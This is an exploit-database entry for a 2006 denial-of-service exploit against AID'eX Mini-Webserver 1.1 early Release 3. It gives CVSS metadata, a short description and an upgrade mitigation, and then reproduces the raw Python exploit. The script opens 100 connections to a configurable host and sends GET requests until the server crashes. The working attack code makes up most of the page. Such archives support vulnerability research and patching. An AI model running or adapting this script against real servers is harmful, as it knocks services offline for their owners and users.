header-logo
Suggest Exploit
vendor:
Mini-Webserver
by:
shinnai
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Mini-Webserver
Affected Version From: 1.1 early Release 3
Affected Version To: 1.1 early Release 3
Patch Exists: Yes
Related CWE: N/A
CPE: aidex:mini-webserver:1.1_early_release_3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

AID’eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service

This exploit sends a large number of GET requests to the webserver, causing it to crash.

Mitigation:

Upgrade to the latest version of AID'eX Mini-Webserver.
Source

Exploit-DB raw data:

import socket

print "---------------------------------------------------------------------"
print "# AID'eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service"
print "# url: http://www.aidex.de/software/webserver/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "# soundtrack: "Suzanne" (Leonard Cohen)
print "---------------------------------------------------------------------"

host = "127.0.0.1"
port = 80

for i in range (0,100):
   connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   connection.connect((host, port))
   connection.send("GET / HTTP/1.0 \n\n")

# milw0rm.com [2006-12-28]